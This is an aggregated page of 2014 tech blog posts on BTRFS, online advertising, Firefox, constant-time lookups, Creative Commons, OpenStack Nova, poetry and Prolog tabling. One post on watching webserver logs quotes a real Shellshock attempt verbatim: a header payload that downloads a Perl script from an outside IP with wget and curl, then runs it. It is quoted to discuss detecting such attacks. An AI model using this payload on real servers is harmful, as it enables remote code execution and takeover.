But the annoyances I had with the 3TB array are repeatable and will annoy many other people. The ctree coruption problem MIGHT have been initially caused by a memory error (it’s a desktop machine without ECC RAM) but the recovery process was problematic and other users might expect problems in such situations.

Related posts:

  1. BTRFS Status March 2014 I’m currently using BTRFS on most systems that I can...
  2. BTRFS Status April 2014 Since my blog post about BTRFS in March [1] not...
  3. BTRFS Status July 2014 My last BTRFS status report was in April [1], it...

Syndicated 2014-12-05 08:09:27 from etbe - Russell Coker

5 Dec 2014 dmarti   » (Master)

Figure 1

Well, "Targeted Advertising Considered Harmful" has a graph now.

This is what happens when you take the ad spending vs. user time data from each year's edition of Mary Meeker's Internet Trends report.

What is it about print advertising that makes it so much more valuable per user minute than web or mobile advertising?

Why has web advertising stayed in roughly the same spot even as the amount of processing power being thrown at the problem of matching users to ads increases?

Why is mobile, the most targetable medium of all, even crappier than the web?

Syndicated 2014-12-05 04:53:09 from Don Marti

4 Dec 2014 pixelbeat   » (Journeyer)

Avoiding interface delays in Thunderbird

Tips for speeding up the thunderbird interface

Syndicated 2014-12-04 15:59:12 from www.pixelbeat.org

4 Dec 2014 slef   » (Master)

Autumn Statement #AS2014, the Google tax and how it relates to Free Software

One of the attention-grabbing measures in the Autumn Statement by Chancellor George Osborne was the google tax on profits going offshore, which may prove unworkable (The Independent). This is interesting because a common mechanism for moving the profits around is so-called transfer pricing, where the business in one country pays an inflated price to its sibling in another country for some supplies. It sounds like the intended way to deal with that is by inspecting company accounts and assessing the underlying profits.

So what’s this got to do with Free Software? Well, one thing the company might buy from itself is a licence to use some branding, paying a fee for reachuse. The main reason this is possible is because copyright is usually a monopoly, so there is no supplier of a replacement product, which makes it hard to assess how much the price has been inflated.

One possible method of assessing the overpayment would be to compare with how much other businesses pay for their branding licences. It would be interesting if Revenue and Customs decide that there’s lots of Royalty Free licensing out there – including Free Software – and so all licence fees paid to related companies are a tax avoidance ruse. Similarly, any premium for a particular self-branded product over a generic equivalent could be classed as profit transfer.

This could have amusing implications for proprietary software producers who sell to sister companies but I doubt that the government will be that radical, so we’ll continue to see absurdities like Starbucks buying all their coffee from famous coffee producing countries Switzerland and the Netherlands. Shouldn’t this be stopped, really?

Syndicated 2014-12-04 04:34:00 from Software Cooperative News » mjr

4 Dec 2014 nbm   » (Journeyer)

Starting is one of the hardest things to do

I guess after writing blog software, buying domains and certificates, setting up Route 53 and Elastic Load Balancing and Elastic Beanstalk, and implementing HSTS, I should start writing some content.

Syndicated 2014-12-03 07:45:00 from Neil Blakey-Milner

3 Dec 2014 lucasr   » (Master)

New tablet UI for Firefox on Android

The new tablet UI for Firefox on Android is now available on Nightly and, soon, Aurora! Here’s a quick overview of the design goals, development process, and implementation.

Design & Goals

Our main goal with the new tablet UI was to simplify the interaction with tabs—read Yuan Wang’s blog post for more context on the design process.

In 36, we focused on getting a solid foundation in place with the core UI changes. It features a brand new tab strip that allows you to create, remove and switch tabs with a single tap, just like on Firefox on desktop.

The toolbar got revamped with a cleaner layout and simpler state changes.

Furthermore, the fullscreen tab panel—accessible from the toolbar—gives you a nice visual overview of your tabs and sets the stage for more advanced features around tab management in future releases.

Development process

At Mozilla, we traditionally work on big features in a separate branch to avoid disruptions in our 6-week development cycles. But that means we don’t get feedback until the feature lands in mozilla-central.

We took a slightly different approach in this project. It was a bit like replacing parts of an airplane while it’s flying.

We first worked on the necessary changes to allow the app to have parallel UI implementations in a separate branch. We then merged the new code to mozilla-central and did most of the UI development there.

This approach enabled us to get early feedback in Nightly before the UI was considered feature-complete.

Implementation

In order to develop the new UI directly in mozilla-central, we had to come up with a way to run either the old or the new tablet UIs in the same build.

We broke up our UI code behind interfaces with multiple concrete implementations for each target UI, used view factories to dynamically instantiate parts of the UI, prefixed overlapping resources, and more.

The new tab strip uses the latest stable release of TwoWayView which got a bunch of important bug fixes and couple of new features such as smooth scroll to position.


Besides improving Firefox’s UX on Android tablets, the new UI lays the groundwork for some cool new features. This is not a final release yet and we’ll be landing bug fixes until 36 is out next year. But you can try it now in our Nightly builds. Let us what you think!

Syndicated 2014-12-03 21:45:22 from Lucas Rocha

3 Dec 2014 vicious   » (Master)

Grossly violating elections

Russia reports gross violations in Moldova elections [1].  And Russia knows all about grossly violating elections…


Syndicated 2014-12-03 17:07:55 from The Spectre of Math

3 Dec 2014 dmarti   » (Master)

Nifty tech delivers ineffective crap at incredible speed!

Andy Oram: A small technological marvel occurs on almost every visit to a web page. In the seconds that elapse between the user’s click and the display of the page, an ad auction takes place in which hundreds of bidders gather whatever information they can get on the user, determine which ads are likely to be of interest, place bids, and transmit the winning ad to be placed in the page. (How browsers get to know you in milliseconds)

Bob Hoffman: The rate of clicking on banner ads is so tiny, that for a media genius to deliver the 100 clicks she promises a client she has to buy over 100,000 impressions. And so, in trying to achieve goals, an enormous amount of ads must be bought. And splattered all over everything we are trying to do online. Also, because they are so ineffective, they are ridiculously cheap. And they keep getting cheaper. The result is that every creepy company in the world can afford these things and annoy the shit out of us with them. (Display Advertising is Poison)

Hold on a minute. Online display ads are terribly ineffective, despite all the bleeding-edge technology being thrown at them?

Close. But not despite. Because.

Syndicated 2014-12-03 15:13:48 from Don Marti

3 Dec 2014 mones   » (Journeyer)

An useful new feature of git

Just read in LWN that git 2.2.0 is coming with the support for signed pushes. What's that? Well, name says it all: you can sign with your public PGP key the 'git push' operation, which of course can be checked on the corresponding server side hook.

This opens a new way of contributing to public repositories without the need to have an actual account on the machine, which is always good for sysadmins :-) and security, of course. In the case of Claws Mails, translators could be pushing their translations, for example, which cold be also good for our release manager too ;-).

Syndicated 2014-12-02 23:46:22 from Ricardo Mones

2 Dec 2014 wingo   » (Master)

there are no good constant-time data structures

Imagine you have a have a web site that people can access via a password. No user name, just a password. There are a number of valid passwords for your service. Determining whether a password is in that set is security-sensitive: if a user has a valid password then they get access to some secret information; otherwise the site emits a 404. How do you determine whether a password is valid?

The go-to solution for this kind of problem for most programmers is a hash table. A hash table is a set of key-value associations, and its nice property is that looking up a value for a key is quick, because it doesn't have to check against each mapping in the set.

Hash tables are commonly implemented as an array of buckets, where each bucket holds a chain. If the bucket array is 32 elements long, for example, then keys whose hash is H are looked for in bucket H mod 32. The chain contains the key-value pairs in a linked list. Looking up a key traverses the list to find the first pair whose key equals the given key; if no pair matches, then the lookup fails.

Unfortunately, storing passwords in a normal hash table is not a great idea. The problem isn't so much in the hash function (the hash in H = hash(K)) as in the equality function; usually the equality function doesn't run in constant time. Attackers can detect differences in response times according to when the "not-equal" decision is made, and use that to break your passwords.

So let's say you ensure that your hash table uses a constant-time string comparator, to protect against the hackers. You're safe! Or not! Because not all chains have the same length, "interested parties" can use lookup timings to distinguish chain lookups that take 2 comparisons compared to 1, for example. In general they will be able to determine the percentage of buckets for each chain length, and given the granularity will probably be able to determine the number of buckets as well (if that's not a secret).

Well, as we all know, small timing differences still leak sensitive information and can lead to complete compromise. So we look for a data structure that takes the same number of algorithmic steps to look up a value. For example, bisection over a sorted array of size SIZE will take ceil(log2(SIZE)) steps to get find the value, independent of what the key is and also independent of what is in the set. At each step, we compare the key and a "mid-point" value to see which is bigger, and recurse on one of the halves.

One problem is, I don't know of a nice constant-time comparison algorithm for (say) 160-bit values. (The "passwords" I am thinking of are randomly generated by the server, and can be as long as I want them to be.) I would appreciate any pointers to such a constant-time less-than algorithm. However a bigger problem is that the time it takes to access memory is not constant; accessing element 0 of the sorted array might take more or less time than accessing element 10. In algorithms we typically model access on a more abstract level, but in hardware there's a complicated parallel and concurrent protocol of low-level memory that takes a non-deterministic time for any given access. "Hot" (more recently accessed) memory is faster to read than "cold" memory.

Non-deterministic memory access leaks timing information, and in the case of binary search the result is disaster: the attacker can literally bisect the actual values of all of the passwords in your set, by observing timing differences. The worst!

You could get around this by ordering "passwords" not by their actual values but by their cryptographic hashes (e.g. by their SHA256 values). This would force the attacker to bisect not over the space of password values but of the space of hash values, which would protect actual password values from the attacker. You still leak some timing information about which paths are "hot" and which are "cold", but you don't expose actual passwords.

It turns out that, as far as I am aware, it is impossible to design a key-value map on common hardware that runs in constant time and is sublinear in the number of entries in the map. As Zooko put it, running in constant time means that the best case and the worst case run in the same amount of time. Of course this is false for bucket-and-chain hash tables, but it's false for binary search as well, as "hot" memory access is faster than "cold" access. The only plausible constant-time operation on a data structure would visit each element of the set in the same order each time. All constant-time operations on data structures are linear in the size of the data structure. Thems the breaks! All you can do is account for the leak in your models, as we did above when ordering values by their hash and not their normal sort order.

Once you have resigned yourself to leaking some bits of the password via timing, you would be fine using normal hash tables as well -- just use a cryptographic hashing function and a constant-time equality function and you're good. No constant-time less-than operator need be invented. You leak something on the order of log2(COUNT) bits via timing, where COUNT is the number of passwords, but since that's behind a hash you can't use it to bisect on actual key values. Of course, you have to ensure that the hash table isn't storing values in sorted order and short-cutting early. This sort of detail isn't usually part of the contract of stock hash table implementations, so you probably still need to build your own.

An alternative is to encode your data structure differently, for example for the "key" to itself contain the value, signed by some private key only known to the server. But this approach is limited by network capacity and the appropriateness of copying for the data in question. It's not appropriate for photos, for example, as they are just too big.

Corrections appreciated from my knowledgeable readers :) I was quite disappointed when I realized that there were no good constant-time data structures and would be happy to be proven wrong. Thanks to Darius Bacon, Zooko Wilcox-O'Hearn, Jan Lehnardt, and Paul Khuong on Twitter for their insights; all mistakes are mine.

Syndicated 2014-12-02 22:01:38 from wingolog

2 Dec 2014 louie   » (Master)

Free-riding and copyleft in cultural commons like Flickr

Flickr recently started selling prints of Creative Commons Attribution-Share Alike photos without sharing any of the revenue with the original photographers. When people were surprised, Flickr said “if you don’t want commercial use, switch the photo to CC non-commercial”.

This seems to have mostly caused two reactions:

  1. This is horrible! Creative Commons is horrible!”
  2. “Commercial reuse is explicitly part of the license; I don’t understand the anger.”

I think it makes sense to examine some of the assumptions those users (and many license authors) may have had, and what that tells us about license choice and design going forward.

Free ride!!, by https://www.flickr.com/photos/dhinakaran/
Free ride!!, by Dhinakaran Gajavarathan, under CC BY 2.0

Free riding is why we share-alike…

As I’ve explained before here, a major reason why people choose copyleft/share-alike licenses is to prevent free rider problems: they are OK with you using their thing, but they want the license to nudge (or push) you in the direction of sharing back/collaborating with them in the future. To quote Elinor Ostrom, who won a Nobel for her research on how commons are managed in the wild, “[i]n all recorded, long surviving, self-organized resource governance regimes, participants invest resources in monitoring the actions of each other so as to reduce the probability of free riding.” (emphasis added)

… but share-alike is not always enough

Copyleft is one of our mechanisms for this in our commons, but it isn’t enough. I think experience in free/open/libre software shows that free rider problems are best prevented when three conditions are present:

  • The work being created is genuinely collaborative — i.e., many authors who contribute similarly to the work. This reduces the cost of free riding to any one author. It also makes it more understandable/tolerable when a re-user fails to compensate specific authors, since there is so much practical difficulty for even a good-faith reuser to evaluate who should get paid and contact them.
  • There is a long-term cost to not contributing back to the parent project. In the case of Linux and many large software projects, this long-term cost is about maintenance and security: if you’re not working with upstream, you’re not going to get the benefit of new fixes, and will pay a cost in backporting security fixes.
  • The license triggers share-alike obligations for common use cases. The copyleft doesn’t need to perfectly capture all use cases. But if at least some high-profile use cases require sharing back, that helps discipline other users by making them think more carefully about their obligations (both legal and social/organizational).

Alternately, you may be able to avoid damage from free rider problems by taking the Apache/BSD approach: genuinely, deeply educating contributors, before they contribute, that they should only contribute if they are OK with a high level of free riding. It is hard to see how this can work in a situation like Flickr’s, because contributors don’t have extensive community contact.1

The most important takeaway from this list is that if you want to prevent free riding in a community-production project, the license can’t do all the work itself — other frictions that somewhat slow reuse should be present. (In fact, my first draft of this list didn’t mention the license at all — just the first two points.)

Flickr is practically designed for free riding

Flickr fails on all the points I’ve listed above — it has no frictions that might discourage free riding.

  • The community doesn’t collaborate on the works. This makes the selling a deeply personal, “expensive” thing for any author who sees their photo for sale. It is very easy for each of them to find their specific materials being reused, and see a specific price being charged by Yahoo that they’d like to see a slice of.
  • There is no cost to re-users who don’t contribute back to the author—the photo will never develop security problems, or get less useful with time.
  • The share-alike doesn’t kick in for virtually any reuses, encouraging Yahoo to look at the relationship as a purely legal one, and encouraging them to forget about the other relationships they have with Flickr users.
  • There is no community education about the expectations for commercial use, so many people don’t fully understand the licenses they’re using.

So what does this mean?

This has already gone on too long, but a quick thought: what this suggests is that if you have a community dedicated to creating a cultural commons, it needs some features that discourage free riding — and critically, mere copyleft licensing might not be good enough, because of the nature of most production of commons of cultural works. In Flickr’s case, maybe this should simply have included not doing this, or making some sort of financial arrangement despite what was legally permissible; for other communities and other circumstances other solutions to the free-rider problem may make sense too.

And I think this argues for consideration of non-commercial licenses in some circumstances as well. This doesn’t make non-commercial licenses more palatable, but since commercial free riding is typically people’s biggest concern, and other tools may not be available, it is entirely possible it should be considered more seriously than free and open source software dogma might have you believe.

  1. It is open to discussion, I think, whether this works in Wikimedia Commons, and how it can be scaled as Commons grows.

Syndicated 2014-12-02 16:14:16 from Luis Villa » Blog

2 Dec 2014 Stevey   » (Master)

Paying attention to webserver logs

If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt:

92.242.4.130 blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://146.71.108.154/pis ; \
curl -O http://146.71.108.154/pis;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts:

152.237.221.99 - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "http://buttons-for-website.com" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban, (or even non-standard SSH ports).

For Apache/webserver exploits we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP IDS project and are horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else things the rules are bad - which is what I thought of hte PHP-IDS set - I guess it's hard to know.

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.

Shame.

Syndicated 2014-12-02 13:51:10 from Steve Kemp's Blog

2 Dec 2014 dmarti   » (Master)

Who's taking all the online ad money? (it's not me)

Chris Sutcliffe says publishers are losing out to adtech: Vox may have both innovative ad formats and significant scale, but traditional display isn't seen as especially exciting in a world where Google, Facebook and ad tech firms are taking home most of the money. (Why has Vox Media been valued at less than half of BuzzFeed?)

Michael Eisenberg says adtech firms aren't making much, either: Adtech and ad networks are equally fragile as they are completely dependent on publishers (many of whom themselves, as Adam points out, are dependent on Google and Facebook.) (A Call to Israeli Engineers! Adtech Is Not For You.)

What if they're both right?

What if the money in online advertising is vanishing not because the publishers are making off with it, or because adtech firms are making off with it, but because the valuable parts of advertising are being just plain destroyed online?

What if web ads as we know them are just the digital equivalent of Windshield Flyer Guy? Checking out the car, leaving a flyer. And failing to send a brand-building signal. Targeting destroys signaling power, so adtech firms, and publishers, are fighting over a pool of money that gets smaller as they get better at grabbing it.

John Broughton explains: From the point of view of an advertiser the biggest problem with ad tech (programmatic as it’s called by advertisers) is that it, and the internet at large, is not currently setup to deliver brand advertising. At all. (How will brand advertising work? )

That old browser bug, the flaw in cookie handling that enables tracking and prevents signaling, is costing us a lot, isn't it? Time to talk about the necessary steps for fixing it , for both brands and publishers.

Syndicated 2014-12-02 06:08:40 from Don Marti

2 Dec 2014 mikal   » (Journeyer)

Specs for Kilo

We're now a few weeks away from the kilo-1 milestone, so I thought it was time to update my summary of the Nova specifications that have been proposed so far. So here we go...

API



API (EC2)

  • Expand support for volume filtering in the EC2 API: review 104450.
  • Implement tags for volumes and snapshots with the EC2 API: review 126553 (fast tracked, approved).


Administrative

  • Check that a service isn't running before deleting it: review 131633.
  • Enable the nova metadata cache to be a shared resource to improve the hit rate: review 126705 (abandoned).
  • Enforce instance uuid uniqueness in the SQL database: review 128097 (fast tracked, approved).
  • Implement a daemon version of rootwrap: review 105404.
  • Log request id mappings: review 132819 (fast tracked).
  • Monitor the health of hypervisor hosts: review 137768.
  • Remove the assumption that there is a single endpoint for services that nova talks to: review 132623.


Cells



Containers Service



Database



Hypervisor: Docker



Hypervisor: FreeBSD

  • Implement support for FreeBSD networking in nova-network: review 127827.


Hypervisor: Hyper-V

  • Allow volumes to be stored on SMB shares instead of just iSCSI: review 102190 (approved).


Hypervisor: Ironic



Hypervisor: VMWare

  • Add ephemeral disk support to the VMware driver: review 126527 (fast tracked, approved).
  • Add support for the HTML5 console: review 127283.
  • Allow Nova to access a VMWare image store over NFS: review 126866.
  • Enable administrators and tenants to take advantage of backend storage policies: review 126547 (fast tracked, approved).
  • Enable the mapping of raw cinder devices to instances: review 128697.
  • Implement vSAN support: review 128600 (fast tracked, approved).
  • Support multiple disks inside a single OVA file: review 128691.
  • Support the OVA image format: review 127054 (fast tracked, approved).


Hypervisor: ironic



Hypervisor: libvirt



Instance features



Internal

  • A lock-free quota implementation: review 135296.
  • Automate the documentation of the virtual machine state transition graph: review 94835.
  • Flatten Aggregate Metadata in the DB: review 134573.
  • Flatten Instance Metadata in the DB: review 134945.
  • Implement a new code coverage API extension: review 130855.
  • Move flavor data out of the system_metadata table in the SQL database: review 126620 (approved).
  • Move to polling for cinder operations: review 135367.
  • Transition Nova to using the Glance v2 API: review 84887.
  • Transition to using glanceclient instead of our own home grown wrapper: review 133485.


Internationalization

  • Enable lazy translations of strings: review 126717 (fast tracked).


Networking



Performance

  • Dynamically alter the interval nova polls components at based on load and expected time for an operation to complete: review 122705.


Scheduler

  • Add a filter to take into account hypervisor type and version when scheduling: review 137714.
  • Add an IOPS weigher: review 127123 (approved, implemented); review 132614.
  • Add instance count on the hypervisor as a weight: review 127871 (abandoned).
  • Allow limiting the flavors that can be scheduled on certain host aggregates: review 122530 (abandoned).
  • Allow the remove of servers from server groups: review 136487.
  • Convert get_available_resources to use an object instead of dict: review 133728.
  • Convert the resource tracker to objects: review 128964 (fast tracked, approved).
  • Create an object model to represent a request to boot an instance: review 127610.
  • Decouple services and compute nodes in the SQL database: review 126895 (approved).
  • Enable adding new scheduler hints to already booted instances: review 134746.
  • Fix the race conditions when migration with server-group: review 135527 (abandoned).
  • Implement resource objects in the resource tracker: review 127609.
  • Improve the ComputeCapabilities filter: review 133534.
  • Isolate the scheduler's use of the Nova SQL database: review 89893.
  • Let schedulers reuse filter and weigher objects: review 134506 (abandoned).
  • Move select_destinations() to using a request object: review 127612.
  • Persist scheduler hints: review 88983.
  • Stop direct lookup for host aggregates in the Nova database: review 132065 (abandoned).
  • Stop direct lookup for instance groups in the Nova database: review 131553.


Security

  • Provide a reference implementation for console proxies that uses TLS: review 126958 (fast tracked, approved).
  • Strongly validate the tenant and user for quota consuming requests with keystone: review 92507.


Storage

  • Allow direct access to LVM volumes if supported by Cinder: review 127318.
  • Enhance iSCSI volume multipath support: review 134299.
  • Failover to alternative iSCSI portals on login failure: review 137468.
  • Implement support for a DRBD driver for Cinder block device access: review 134153.
  • Refactor ISCSIDriver to support other iSCSI transports besides TCP: review 130721.
  • StorPool volume attachment support: review 115716.
  • Support iSCSI live migration for different iSCSI target: review 132323 (approved).


Tags for this post: openstack kilo blueprint spec
Related posts: Specs for Kilo; One week of Nova Kilo specifications; Compute Kilo specs are open; On layers; Juno nova mid-cycle meetup summary: slots; My candidacy for Kilo Compute PTL

Comment

Syndicated 2014-12-01 20:13:00 from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

2 Dec 2014 marnanel   » (Journeyer)

Gentle Readers: fold your hands

Gentle Readers
a newsletter made for sharing
volume 2, number 6
27th November 2014: fold your hands
What I’ve been up to

As I mentioned last time, I've been down south for the funeral of my grandmother Joy.

My brother Andrew and sister-in-law Alice, who are wonderful, have made an Advent calendar about how churches can be welcoming to everyone, with each day written by a different person and discussing a different group: the Inclusive Advent Calendar.

A poem of mine

This is the poem I read at my grandmother's funeral.

 

ODE TO JOY

Our Joy has left us. Should we say goodbye?
Not while we smile recalling what she said;
not while the sharp remembrance of her eye
surprises us through all the days ahead;
not while the greenest branches of her tree
still show her love for living and for learning;
not while each grandchild welcomed on her knee
holds hope the world should never tire of turning;
not while our Joy lives on. The Prince of Peace
who holds her safe until we meet again
will call us too, where separations cease,
and builds a bridge between the now and then,
a bridge that even death could not destroy.
So lives our love, our hope, for peace for Joy.

A picture

 

https://gentlereaders.uk/pics/sidney-formal-hall

I wanted to show you a happy photo, so here's one of my grandparents when they came up to Cambridge for formal hall at my college. I think it's from 1998.

Something from someone else

This is Kipling's biography of Napoleon Bonaparte.

"Gay go up, gay go down" in the third stanza is a rhyme that was used at the time by children on seesaws. Can anyone explain the odd stress pattern on "Trafalgar" in the fifth stanza?

A ST HELENA LULLABY
by Rudyard Kipling

"How far is St. Helena from a little child at play!"
What makes you want to wander there with all the world between?
Oh, Mother, call your son again, or else he'll run away.
(No one thinks of winter when the grass is green!)

"How far is St. Helena from a fight in Paris street?"
I haven't time to answer now– the men are falling fast.
The guns begin to thunder, and the drums begin to beat.
(If you take the first step, you will take the last!)

"How far is St. Helena from the field of Austerlitz?"
You couldn't hear me if I told– so loud the cannons roar.
But not so far for people who are living by their wits.
("Gay go up" means "Gay go down" the wide world o'er!)

"How far is St. Helena from the Emperor of France?"
I cannot see– I cannot tell– the crowns they dazzle so.
The Kings sit down to dinner, and the Queens stand up to dance.
(After open weather, you may look for snow!)

"How far is St. Helena from the Capes of Trafalgar?"
A longish way– a longish way– with ten year more to run.
It's South across the water underneath a setting star.
(What you cannot finish, you must leave undone!)

"How fair is St. Helena from the Beresina ice?"
An ill way– a chill way– the ice begins to crack.
But not so far for gentlemen who never took advice.
(When you can't go forward you must e'en come back!)

"How far is St. Helena from the field of Waterloo?"
A near way– a clear way– the ship will take you soon.
A pleasant place for gentlemen with little left to do.
(Morning never tries you till the afternoon!)

"How far from St. Helena to the Gate of Heaven's Grace?"
That no one knows– that no one knows– and no one ever will.
But fold your hands across your heart and cover up your face,
And after all your trapesings, child, lie still! 

Colophon

Gentle Readers is published on Mondays and Thursdays, and I want you to share it. The archives are at https://gentlereaders.uk, and so is a form to get on the mailing list. If you have anything to say or reply, or you want to be added or removed from the mailing list, I’m at thomas@thurman.org.uk and I’d love to hear from you. The newsletter is reader-supported; please pledge something if you can afford to, and please don't if you can't. ISSN 2057-052X. Love and peace to you all.

This entry was originally posted at http://marnanel.dreamwidth.org/317256.html. Please comment there using OpenID.

Syndicated 2014-12-02 00:36:53 from Monument

2 Dec 2014 marnanel   » (Journeyer)

Bonka, the Alphabet, and the Dreaded Balloon

When I was in Year 5 at primary school, though we called it third year juniors in those days, we were all given an assignment to write a picture book so that we could go into the infant school and read it to them. I have just found the picture book I wrote. It's called

BONKA,
THE ALPHABET,
AND THE DREADED BALLOON

http://thomasthurman.org/pics/bonka0

So of course I realised I had to blog it. I'll only do a few pages at a time, but feedback is very welcome.

http://thomasthurman.org/pics/bonka1
Here is Bonka. He is a slug.


http://thomasthurman.org/pics/bonka2
Here are the alphabet. These are the small letters.

http://thomasthurman.org/pics/bonka3
This is The Dreaded Balloon. He is BAD.

http://thomasthurman.org/pics/bonka4
One day, Bonka tripped over something.

http://thomasthurman.org/pics/bonka5
"Who are you?" asked Bonka. "I'm i," said i.

Let me know if you'd like to see the rest.

This entry was originally posted at http://marnanel.dreamwidth.org/317158.html. Please comment there using OpenID.

Syndicated 2014-12-01 23:49:07 from Monument

1 Dec 2014 joey   » (Master)

snowdrift - sustainable crowdfunding for free software development

In a recent blog post, I mentioned how lucky I feel to keep finding ways to work on free software. In the past couple years, I've had a successful Kickstarter, and followed that up with a second crowdfunding campaign, and now a grant is funding my work. A lot to be thankful for.

A one-off crowdfunding campaign to fund free software development is wonderful, if you can pull it off. It can start a new project, or kick an existing one into a higher gear. But in many ways, free software development is a poor match for kickstarter-type crowdfunding. Especially when it comes to ongoing development, which it's really hard to do a crowdfunding pitch for. That's why I was excited to find Snowdrift.coop, which has a unique approach.

Imagine going to a web page for a free software project that you care about, and seeing this button:

1283 patrons will donate MORE when you pledge

That's a lot stronger incentive than some paypal dontation button or flattr link! The details of how it works are explained on their intro page, or see the ever-insightful and thoughtful Mike Linksvayer's blog post about it.

When I found out about this, I immediately sent them a one-off donation. Later, I got to meet one of the developers face to face in Portland. I've also done a small amount of work on the Snowdrift platform, which is itself free software. (My haskell code will actually render that button above!)

Free software is important, and its funding should be based, not on how lucky or good we are at kickstarter pitches, but on its quality and how useful it is to everyone. Snowdrift is the most interesting thing I've seen in this space, and I really hope they succeed. If you agree, they're running their own crowdfunding campaign right now.

Syndicated 2014-12-01 18:36:39 from see shy jo

30 Nov 2014 sye   » (Journeyer)

Darren Wilson resigned from police force. He married his fellow officer Barbara who had a child from a previous relationship. They are expecting their first child. Wilson has supporters. For another local news, parents are looking for missing college senior since eve of thanksgiving day. $10,000 reward posted for any info lead to his safe return.

30 Nov 2014 dmarti   » (Master)

Unpacking privacy

Maybe the word "privacy" has something in common with the "freedom" in "free software". Privacy is a big heavy word, with too many meanings to be be a good part of a business message. Some free software people handled their version of the problem by coming up with the open source brand, to help close deals without having to have a big conversation about freedom. Maybe what we need today is something similar, a name for a subset of privacy that's worth money.

The big place to cash in is display advertising on the web. The money in advertising is in signaling, not direct response. And an ad medium can optimize for response rate or for signaling power, but not both. So there's clearly a small part of "privacy" that has cash value: for publishers and brands on the web, the quality of having an audience rather than a set of database records, the chance at making web ads work like magazine ads, not like the "windshield flyers" they are today.

Before the emergence of the "open source" brand, people kept having "software freedom" vs. "commercial software" arguments. But the problem wasn't freedom on one side against business on the other. The framing around open source made it clear that some kinds of commerce work better when market participants have some kinds of freedom.

Today, "people want privacy" sounds to me like "people want freedom" and "people want data-driven services" sounds like "people want software functionality." That's a recipe for wasting a lot of carpal tunnels on having two different arguments, threaded together. We need a new word for the economically helpful aspects of privacy, so that we don't have to argue about a word that's just as complicated as "freedom" when we just want to implement a subset of it.

(We do need to keep talking about freedom and privacy sometimes, even though they're hard words. But just as we can have better Internet freedom conversations when we can show examples of corporate-supported free software, I mean open source, we'll also be in a better position to talk privacy when we can point to whatever the new word for a subset of privacy is projects that work in the interests of publishers and brands.)

Publishers and brands can both use whatever the new word is. Publishers first. When ad networks can track the same user from expensive sites to cheap ones, and agencies buy impressions based on who the ad networks say the user is, then high-value sites (the ones that invest in original content) are stuck in the business of selling the same impressions as lower-value sites.

Once the ad networks have a user labeled as a "car intender", then some low-end site can show him a cheap cat GIF and get paid to run a (relatively) high-value car ad on it. Makes it harder for the sites that actually review cars. Content sites lose, and intermediaries win.

The question then is, why do high-value sites participate in user tracking at all? Why not just run only first-party ads? There's some research on that. The problem is that if the medium is targetable, then the best strategy for an individual site is to do targeting, even if (because of the signaling value of its content) the site would do better in a system where no user could be targeted. When we stop thinking about privacy as a big, complicated, hard concept, and try to break out some kind of Minimum Viable Privacy, just enough to protect that "car intender" from site to site tracking, then ways out of the race to the bottom start to present themselves.

For example, high-quality sites could be encouraging users to install anti-tracking tools, to make those users less targetable anywhere. This would reduce revenue in the short term for the high-quality sites (by making inventory disappear) but have a much more dramatic effect on the lower-quality sites that are only viable because of targeting. For brands, the case for helping and encouraging customers and prospects to protect a subset of "privacy" is even stronger. Just need a word for it.

Syndicated 2014-11-30 05:59:05 from Don Marti

29 Nov 2014 dmarti   » (Master)

simplicity

Complexity in organizational structures and agreements between people can hide information about what is the right thing to do.

The obligation to do the right thing, however, is conserved, passed through and divided among every participant in an organization or every party to an agreement.

This is the best reason I can think of, so far, to look for simplicity in organizations and in the terms of agreements.

Syndicated 2014-11-29 18:22:27 from Don Marti

28 Nov 2014 tampe   » (Journeyer)


If I'm going to do this an infinite number of times, I can just as well say I did success in doing so and get a good night sleep

I just released a new version of guile-log e.g. logic programming in guile scheme. This release has a few major improvement. The most noteworthy of them are

Support for tablating, e.g. prolog versions of memoisations. There are a few important facts to note First of all the memoisation means that many infinite recursions will success and you can get meaning full answer out of


f(X) :- f(X).

The meaning with memoisation is of cause if f is continued ad infinite and never binds X then f will succeed and X is not bound. This is a nice feature together with good support of recursive datastructures that is now included in guile-log. The other pecularity is that for a given input the code can yield many outputs via backtracking. So it is not a easy peasy thing to churn out. I am not by any means first in producing such a tablating system. The most interesting thing though is that the machinery to implement this was (almost) already there. And the solution is simply just a meta programming on those tools.

The system works by for each templated function have a functional hash from any input to a list of outputs that may not be a unique list. As new solutions are produced, the new solutions is consed on the list, in evaluating the function it will lookup the list of solutions and the produce them as answers backtrackingly. when all solutions have been produced, it will then lookup the functional datastructure again and see if there is any new solutions, if not it will store a continuation and then fail. There will be a base e.g. the first time the function is called that if all continuation points have failed restart all continuations, each of them will reevaluate if there is any new solutions to produce and if they all fail the next round a fixpoint is found an no new solutions is produced. Neat. Be careful with negation (do you know why). Let's show some prolog ...


memo.scm:
------------------------------------
(compile-prolog-string
"
-functorize(tabling).
ff(X) :- (X=[Y,A,B]),ff(A),ff(B),(Y=1;Y=2).
"
------------------------------------
scheme@(guile-user)> (use-modules (logic guile-log iso-prolog))
scheme@(guile-user)> (load "memo.scm")
scheme@(guile-user)> ,L prolog
Happy hacking with Prolog! To switch back, type `,L scheme'.
prolog@(guile-user)> .rec ff(X).

X = {0}[1, ref[0], ref[0]]
more (y/n/a/s) > s
prolog@(guile-user)> .10 .c

X = {0}[2, ref[0], ref[0]]

X = {0}[1, ref[0], {1}[1, ref[1], ref[1]]]

X = {0}[2, ref[0], {1}[1, ref[1], ref[1]]]

X = {0}[1, ref[0], {1}[2, ref[1], ref[1]]]

